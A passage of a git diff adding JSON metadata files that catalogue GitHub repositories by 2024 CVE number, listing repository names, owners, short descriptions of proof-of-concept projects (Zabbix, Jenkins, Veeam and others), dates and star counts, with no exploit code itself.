"pushed_at": "2024-06-18T11:05:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823986903, + "name": "Digisol-DG--GR1321-s-Password-Storage-in-Plaintext--CVE-2024-4232", + "full_name": "Redfox-Secuirty\/Digisol-DG--GR1321-s-Password-Storage-in-Plaintext--CVE-2024-4232", + "owner": { + "login": "Redfox-Secuirty", + "id": 173128884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173128884?v=4", + "html_url": "https:\/\/github.com\/Redfox-Secuirty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Redfox-Secuirty\/Digisol-DG--GR1321-s-Password-Storage-in-Plaintext--CVE-2024-4232", + "description": null, + "fork": false, + "created_at": "2024-07-04T06:30:19Z", + "updated_at": "2024-07-04T06:30:22Z", + "pushed_at": "2024-07-04T06:30:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42327.json b/2024/CVE-2024-42327.json new file mode 100644 index 0000000000..01853c7d0d --- /dev/null +++ b/2024/CVE-2024-42327.json @@ -0,0 +1,219 @@ +[ + { + "id": 896657083, + "name": "cve-2024-42327", + "full_name": "aramosf\/cve-2024-42327", + "owner": { + "login": "aramosf", + "id": 3511842, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3511842?v=4", + "html_url": "https:\/\/github.com\/aramosf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aramosf\/cve-2024-42327", + "description": "cve-2024-42327 ZBX-25623", + "fork": false, + "created_at": "2024-12-01T00:15:27Z", + "updated_at": "2025-01-06T08:25:25Z", + "pushed_at": "2024-12-01T01:18:36Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 29, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 897899835, + "name": "CVE-2024-42327", + "full_name": "compr00t\/CVE-2024-42327", + "owner": { + "login": "compr00t", + "id": 11025516, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11025516?v=4", + "html_url": "https:\/\/github.com\/compr00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/compr00t\/CVE-2024-42327", + "description": "PoC for CVE-2024-42327 \/ ZBX-25623", + "fork": false, + "created_at": "2024-12-03T12:44:07Z", + "updated_at": "2024-12-26T01:27:56Z", + "pushed_at": "2024-12-03T12:56:52Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 899606694, + "name": "CVE-2024-42327", + "full_name": "depers-rus\/CVE-2024-42327", + "owner": { + "login": "depers-rus", + "id": 173357545, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173357545?v=4", + "html_url": "https:\/\/github.com\/depers-rus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/depers-rus\/CVE-2024-42327", + "description": null, + "fork": false, + "created_at": "2024-12-06T16:06:00Z", + "updated_at": "2024-12-11T02:16:10Z", + "pushed_at": "2024-12-06T18:56:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 900099379, + "name": "CVE-2024-42327_Zabbix_SQLI", + "full_name": "watchdog1337\/CVE-2024-42327_Zabbix_SQLI", + "owner": { + "login": "watchdog1337", + "id": 63520692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63520692?v=4", + "html_url": "https:\/\/github.com\/watchdog1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchdog1337\/CVE-2024-42327_Zabbix_SQLI", + "description": "POC for CVE-2024-42327, an authenticated SQL Injection in Zabbix through the user.get API Method", + "fork": false, + "created_at": "2024-12-07T21:25:40Z", + "updated_at": "2024-12-12T22:27:55Z", + "pushed_at": "2024-12-08T12:27:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 901596404, + "name": "Zabbix---CVE-2024-42327", + "full_name": "itform-fr\/Zabbix---CVE-2024-42327", + "owner": { + "login": "itform-fr", + "id": 131718750, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131718750?v=4", + "html_url": "https:\/\/github.com\/itform-fr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/itform-fr\/Zabbix---CVE-2024-42327", + "description": null, + "fork": false, + "created_at": "2024-12-11T00:39:26Z", + "updated_at": "2024-12-12T16:27:33Z", + "pushed_at": "2024-12-11T00:46:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 902138431, + "name": "CVE-2024-42327", + "full_name": "igorbf495\/CVE-2024-42327", + "owner": { + "login": "igorbf495", + "id": 113364443, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113364443?v=4", + "html_url": "https:\/\/github.com\/igorbf495", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/igorbf495\/CVE-2024-42327", + "description": "writeup cve-2024-42327", + "fork": false, + "created_at": "2024-12-12T01:32:26Z", + "updated_at": "2024-12-12T19:21:47Z", + "pushed_at": "2024-12-12T19:21:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 910901711, + "name": "Zabbix-CVE-2024-42327-SQL-Injection-RCE", + "full_name": "BridgerAlderson\/Zabbix-CVE-2024-42327-SQL-Injection-RCE", + "owner": { + "login": "BridgerAlderson", + "id": 139403792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139403792?v=4", + "html_url": "https:\/\/github.com\/BridgerAlderson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BridgerAlderson\/Zabbix-CVE-2024-42327-SQL-Injection-RCE", + "description": "Zabbix CVE-2024-42327 PoC", + "fork": false, + "created_at": "2025-01-01T18:25:44Z", + "updated_at": "2025-01-07T16:16:09Z", + "pushed_at": "2025-01-03T13:49:03Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 29, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42346.json b/2024/CVE-2024-42346.json new file mode 100644 index 0000000000..221f9307fd --- /dev/null +++ b/2024/CVE-2024-42346.json @@ -0,0 +1,36 @@ +[ + { + "id": 890535432, + "name": "CVE-2024-42346", + "full_name": "partywavesec\/CVE-2024-42346", + "owner": { + "login": "partywavesec", + "id": 98420665, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98420665?v=4", + "html_url": "https:\/\/github.com\/partywavesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/partywavesec\/CVE-2024-42346", + "description": "CVE-2024-42346 POC", + "fork": false, + "created_at": "2024-11-18T18:31:03Z", + "updated_at": "2024-12-30T23:20:30Z", + "pushed_at": "2024-11-18T18:32:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-42346", + "security" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42448.json b/2024/CVE-2024-42448.json new file mode 100644 index 0000000000..cf4e7ca06d --- /dev/null +++ b/2024/CVE-2024-42448.json @@ -0,0 +1,33 @@ +[ + { + "id": 899013762, + "name": "CVE-2024-42448-RCE", + "full_name": "h3lye\/CVE-2024-42448-RCE", + "owner": { + "login": "h3lye", + "id": 190727577, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/190727577?v=4", + "html_url": "https:\/\/github.com\/h3lye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h3lye\/CVE-2024-42448-RCE", + "description": "Veeam Service Provider Console (VSPC) remote code execution.", + "fork": false, + "created_at": "2024-12-05T13:12:44Z", + "updated_at": "2024-12-05T13:24:50Z", + "pushed_at": "2024-12-05T13:24:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42461.json b/2024/CVE-2024-42461.json new file mode 100644 index 0000000000..6a5e10cab5 --- /dev/null +++ b/2024/CVE-2024-42461.json @@ -0,0 +1,33 @@ +[ + { + "id": 839055208, + "name": "CVE-2024-42461", + "full_name": "fevar54\/CVE-2024-42461", + "owner": { + "login": "fevar54", + "id": 80516843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80516843?v=4", + "html_url": "https:\/\/github.com\/fevar54", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fevar54\/CVE-2024-42461", + "description": "Se han identificado problemas en la verificación de firmas ECDSA y EDDSA en el proyecto Wycheproof. Las comprobaciones ausentes durante la etapa de decodificación de firmas permiten agregar o eliminar bytes cero, lo que afecta la capacidad de envío de correos. ", + "fork": false, + "created_at": "2024-08-06T21:56:15Z", + "updated_at": "2024-08-06T22:19:23Z", + "pushed_at": "2024-08-06T22:19:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42640.json b/2024/CVE-2024-42640.json new file mode 100644 index 0000000000..fb3e1e1f31 --- /dev/null +++ b/2024/CVE-2024-42640.json @@ -0,0 +1,69 @@ +[ + { + "id": 870154624, + "name": "CVE-2024-42640", + "full_name": "rvizx\/CVE-2024-42640", + "owner": { + "login": "rvizx", + "id": 84989569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84989569?v=4", + "html_url": "https:\/\/github.com\/rvizx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rvizx\/CVE-2024-42640", + "description": "Unauthenticated Remote Code Execution via Angular-Base64-Upload Library ", + "fork": false, + "created_at": "2024-10-09T14:35:06Z", + "updated_at": "2024-12-11T06:12:17Z", + "pushed_at": "2024-10-18T15:10:13Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "angular-base64-upload", + "cve-2024-42640", + "exploit", + "poc-exploit" + ], + "visibility": "public", + "forks": 16, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 891216922, + "name": "CVE-2024-42640", + "full_name": "KTN1990\/CVE-2024-42640", + "owner": { + "login": "KTN1990", + "id": 33407405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4", + "html_url": "https:\/\/github.com\/KTN1990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KTN1990\/CVE-2024-42640", + "description": "Unauthenticated Remote Code Execution via Angular-Base64-Upload Library (npm:bower)", + "fork": false, + "created_at": "2024-11-19T23:54:30Z", + "updated_at": "2024-11-21T03:18:25Z", + "pushed_at": "2024-11-20T22:15:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42642.json b/2024/CVE-2024-42642.json new file mode 100644 index 0000000000..d8e6b476aa --- /dev/null +++ b/2024/CVE-2024-42642.json @@ -0,0 +1,33 @@ +[ + { + "id": 850005996, + "name": "CVE-2024-42642", + "full_name": "VL4DR\/CVE-2024-42642", + "owner": { + "login": "VL4DR", + "id": 96614714, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96614714?v=4", + "html_url": "https:\/\/github.com\/VL4DR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VL4DR\/CVE-2024-42642", + "description": null, + "fork": false, + "created_at": "2024-08-30T17:24:58Z", + "updated_at": "2024-11-14T00:25:35Z", + "pushed_at": "2024-09-19T22:32:33Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42657.json b/2024/CVE-2024-42657.json new file mode 100644 index 0000000000..ee1114de25 --- /dev/null +++ b/2024/CVE-2024-42657.json @@ -0,0 +1,33 @@ +[ + { + "id": 843654614, + "name": "CVE-2024-42657", + "full_name": "sudo-subho\/CVE-2024-42657", + "owner": { + "login": "sudo-subho", + "id": 77957540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77957540?v=4", + "html_url": "https:\/\/github.com\/sudo-subho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudo-subho\/CVE-2024-42657", + "description": "CVE-2024-42657 An issue in wishnet Nepstech Wifi Router NTPL-XPON1GFEVN v1.0 allows a remote attacker to obtain sensitive information via the lack of encryption during login process.", + "fork": false, + "created_at": "2024-08-17T02:55:14Z", + "updated_at": "2024-08-17T02:59:43Z", + "pushed_at": "2024-08-17T02:59:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42658.json b/2024/CVE-2024-42658.json new file mode 100644 index 0000000000..3bf93b012f --- /dev/null +++ b/2024/CVE-2024-42658.json @@ -0,0 +1,33 @@ +[ + { + "id": 843655957, + "name": "CVE-2024-42658", + "full_name": "sudo-subho\/CVE-2024-42658", + "owner": { + "login": "sudo-subho", + "id": 77957540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77957540?v=4", + "html_url": "https:\/\/github.com\/sudo-subho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudo-subho\/CVE-2024-42658", + "description": " CVE-2024-42658 An issue in wishnet Nepstech Wifi Router NTPL-XPON1GFEVN v1.0 allows a remote attacker to obtain sensitive information via the cookies parameter", + "fork": false, + "created_at": "2024-08-17T03:02:20Z", + "updated_at": "2024-08-17T03:03:41Z", + "pushed_at": "2024-08-17T03:03:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42758.json b/2024/CVE-2024-42758.json new file mode 100644 index 0000000000..9ceb60d8b9 --- /dev/null +++ b/2024/CVE-2024-42758.json @@ -0,0 +1,33 @@ +[ + { + "id": 842971544, + "name": "CVE-2024-42758", + "full_name": "1s1ldur\/CVE-2024-42758", + "owner": { + "login": "1s1ldur", + "id": 124069385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124069385?v=4", + "html_url": "https:\/\/github.com\/1s1ldur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1s1ldur\/CVE-2024-42758", + "description": "CVE-2024-42758 - Dokuwiki (indexmenu plugin) - XSS Vulnerability", + "fork": false, + "created_at": "2024-08-15T13:59:50Z", + "updated_at": "2024-08-16T14:07:41Z", + "pushed_at": "2024-08-15T19:33:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42834.json b/2024/CVE-2024-42834.json new file mode 100644 index 0000000000..e8600b9bdb --- /dev/null +++ b/2024/CVE-2024-42834.json @@ -0,0 +1,33 @@ +[ + { + "id": 846804238, + "name": "CVE-2024-42834", + "full_name": "CyberSec-Supra\/CVE-2024-42834", + "owner": { + "login": "CyberSec-Supra", + "id": 179279546, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179279546?v=4", + "html_url": "https:\/\/github.com\/CyberSec-Supra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CyberSec-Supra\/CVE-2024-42834", + "description": null, + "fork": false, + "created_at": "2024-08-24T02:21:33Z", + "updated_at": "2024-08-24T02:26:10Z", + "pushed_at": "2024-08-24T02:26:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42845.json b/2024/CVE-2024-42845.json new file mode 100644 index 0000000000..9fa4ef98f3 --- /dev/null +++ b/2024/CVE-2024-42845.json @@ -0,0 +1,37 @@ +[ + { + "id": 846570899, + "name": "invesalius3_vulnerabilities", + "full_name": "partywavesec\/invesalius3_vulnerabilities", + "owner": { + "login": "partywavesec", + "id": 98420665, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98420665?v=4", + "html_url": "https:\/\/github.com\/partywavesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/partywavesec\/invesalius3_vulnerabilities", + "description": "InVesalius discovered CVE. CVE-2024-42845, CVE-2024-44825", + "fork": false, + "created_at": "2024-08-23T13:43:27Z", + "updated_at": "2024-12-31T10:26:10Z", + "pushed_at": "2024-12-20T09:48:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-42845", + "cve-2024-44825", + "security" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42849.json b/2024/CVE-2024-42849.json new file mode 100644 index 0000000000..79a5fd2791 --- /dev/null +++ b/2024/CVE-2024-42849.json @@ -0,0 +1,33 @@ +[ + { + "id": 843144280, + "name": "CVE-2024-42849", + "full_name": "njmbb8\/CVE-2024-42849", + "owner": { + "login": "njmbb8", + "id": 11412483, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11412483?v=4", + "html_url": "https:\/\/github.com\/njmbb8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/njmbb8\/CVE-2024-42849", + "description": "An issue in Silverpeas v.6.4.2 and lower allows a remote attacker to cause a denial of service via the password change function.", + "fork": false, + "created_at": "2024-08-15T21:57:29Z", + "updated_at": "2024-08-15T22:18:21Z", + "pushed_at": "2024-08-15T22:18:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42850.json b/2024/CVE-2024-42850.json new file mode 100644 index 0000000000..d0cfe760a9 --- /dev/null +++ b/2024/CVE-2024-42850.json @@ -0,0 +1,33 @@ +[ + { + "id": 843137855, + "name": "CVE-2024-42850", + "full_name": "njmbb8\/CVE-2024-42850", + "owner": { + "login": "njmbb8", + "id": 11412483, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11412483?v=4", + "html_url": "https:\/\/github.com\/njmbb8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/njmbb8\/CVE-2024-42850", + "description": "An issue in Silverpeas v6.4.2 and lower allows for the bypassing of password complexity requirements.", + "fork": false, + "created_at": "2024-08-15T21:32:29Z", + "updated_at": "2024-08-26T09:13:40Z", + "pushed_at": "2024-08-15T21:55:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42861.json b/2024/CVE-2024-42861.json new file mode 100644 index 0000000000..4475c1e102 --- /dev/null +++ b/2024/CVE-2024-42861.json @@ -0,0 +1,33 @@ +[ + { + "id": 860707248, + "name": "CVE-2024-42861", + "full_name": "qiupy123\/CVE-2024-42861", + "owner": { + "login": "qiupy123", + "id": 71477043, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71477043?v=4", + "html_url": "https:\/\/github.com\/qiupy123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qiupy123\/CVE-2024-42861", + "description": "the", + "fork": false, + "created_at": "2024-09-21T01:24:25Z", + "updated_at": "2024-09-21T02:21:53Z", + "pushed_at": "2024-09-21T02:21:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42919.json b/2024/CVE-2024-42919.json new file mode 100644 index 0000000000..81cdb0de6b --- /dev/null +++ b/2024/CVE-2024-42919.json @@ -0,0 +1,33 @@ +[ + { + "id": 844700853, + "name": "CVE-2024-42919", + "full_name": "jeyabalaji711\/CVE-2024-42919", + "owner": { + "login": "jeyabalaji711", + "id": 122691992, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122691992?v=4", + "html_url": "https:\/\/github.com\/jeyabalaji711", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jeyabalaji711\/CVE-2024-42919", + "description": null, + "fork": false, + "created_at": "2024-08-19T19:50:50Z", + "updated_at": "2024-08-19T20:41:07Z", + "pushed_at": "2024-08-19T20:40:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4295.json b/2024/CVE-2024-4295.json new file mode 100644 index 0000000000..5633fa0aba --- /dev/null +++ b/2024/CVE-2024-4295.json @@ -0,0 +1,64 @@ +[ + { + "id": 810747489, + "name": "CVE-2024-4295-Poc", + "full_name": "truonghuuphuc\/CVE-2024-4295-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-4295-Poc", + "description": "CVE-2024-4295 Email Subscribers by Icegram Express <= 5.7.20 - Unauthenticated SQL Injection via hash", + "fork": false, + "created_at": "2024-06-05T09:29:20Z", + "updated_at": "2024-12-31T13:25:42Z", + "pushed_at": "2024-06-05T10:24:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815013929, + "name": "CVE-2024-4295-Poc", + "full_name": "cve-2024\/CVE-2024-4295-Poc", + "owner": { + "login": "cve-2024", + "id": 172750025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172750025?v=4", + "html_url": "https:\/\/github.com\/cve-2024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cve-2024\/CVE-2024-4295-Poc", + "description": null, + "fork": false, + "created_at": "2024-06-14T07:04:36Z", + "updated_at": "2024-06-14T07:06:24Z", + "pushed_at": "2024-06-14T07:06:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42992.json b/2024/CVE-2024-42992.json new file mode 100644 index 0000000000..37a0cb6d26 --- /dev/null +++ b/2024/CVE-2024-42992.json @@ -0,0 +1,33 @@ +[ + { + "id": 847526830, + "name": "CVE-2024-42992", + "full_name": "thanhh23\/CVE-2024-42992", + "owner": { + "login": "thanhh23", + "id": 82047405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82047405?v=4", + "html_url": "https:\/\/github.com\/thanhh23", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thanhh23\/CVE-2024-42992", + "description": "CVE-2024-42992", + "fork": false, + "created_at": "2024-08-26T03:13:45Z", + "updated_at": "2024-08-31T12:56:04Z", + "pushed_at": "2024-08-22T04:43:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43035.json b/2024/CVE-2024-43035.json new file mode 100644 index 0000000000..2d3daf66c2 --- /dev/null +++ b/2024/CVE-2024-43035.json @@ -0,0 +1,33 @@ +[ + { + "id": 845746668, + "name": "Fonoster-LFI-PoC", + "full_name": "ZeroPathAI\/Fonoster-LFI-PoC", + "owner": { + "login": "ZeroPathAI", + "id": 170791525, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170791525?v=4", + "html_url": "https:\/\/github.com\/ZeroPathAI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZeroPathAI\/Fonoster-LFI-PoC", + "description": "Proof-of-concept exploit for Fonoster LFI vulnerability (CVE-2024-43035)", + "fork": false, + "created_at": "2024-08-21T21:12:14Z", + "updated_at": "2024-08-23T21:43:10Z", + "pushed_at": "2024-08-23T21:42:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43044.json b/2024/CVE-2024-43044.json new file mode 100644 index 0000000000..74e9f6c698 --- /dev/null +++ b/2024/CVE-2024-43044.json @@ -0,0 +1,130 @@ +[ + { + "id": 839739992, + "name": "CVE-2024-43044", + "full_name": "HwMex0\/CVE-2024-43044", + "owner": { + "login": "HwMex0", + "id": 102358575, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102358575?v=4", + "html_url": "https:\/\/github.com\/HwMex0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HwMex0\/CVE-2024-43044", + "description": "The script checks Jenkins endpoints for CVE-2024-43044 by retrieving the Jenkins version from the innstance and comparing it against known vulnerable version ranges.", + "fork": false, + "created_at": "2024-08-08T08:28:26Z", + "updated_at": "2024-12-29T12:07:29Z", + "pushed_at": "2024-08-08T09:32:00Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-43044", + "detection", + "jenkins" + ], + "visibility": "public", + "forks": 6, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 839823974, + "name": "SECURITY-3430", + "full_name": "jenkinsci-cert\/SECURITY-3430", + "owner": { + "login": "jenkinsci-cert", + "id": 9285726, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9285726?v=4", + "html_url": "https:\/\/github.com\/jenkinsci-cert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jenkinsci-cert\/SECURITY-3430", + "description": 